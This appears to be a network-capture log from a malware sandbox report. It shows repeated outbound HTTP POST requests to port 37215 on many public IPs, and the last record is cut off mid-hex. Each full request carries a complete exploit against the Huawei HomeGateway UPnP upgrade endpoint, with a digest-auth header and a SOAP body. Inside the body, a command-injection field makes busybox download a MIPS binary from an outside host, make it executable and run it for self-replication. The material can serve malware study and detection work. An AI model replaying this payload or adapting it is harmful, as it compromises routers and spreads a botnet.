                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1214192.168.2.1534730216.62.213.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.745048046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1215192.168.2.155544441.221.155.4937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.745089054 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1216192.168.2.1533100157.97.215.17237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.745135069 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1217192.168.2.155054241.46.151.10537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.745193005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1218192.168.2.1554344172.173.239.21237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.745549917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1219192.168.2.155608241.161.159.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.766978979 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1220192.168.2.1541390198.38.18.14637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.767009020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1221192.168.2.1558466197.30.11.1337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.767050028 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1222192.168.2.1560858148.166.246.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.767076969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1223192.168.2.1557160197.126.97.19237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:01.732685089 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 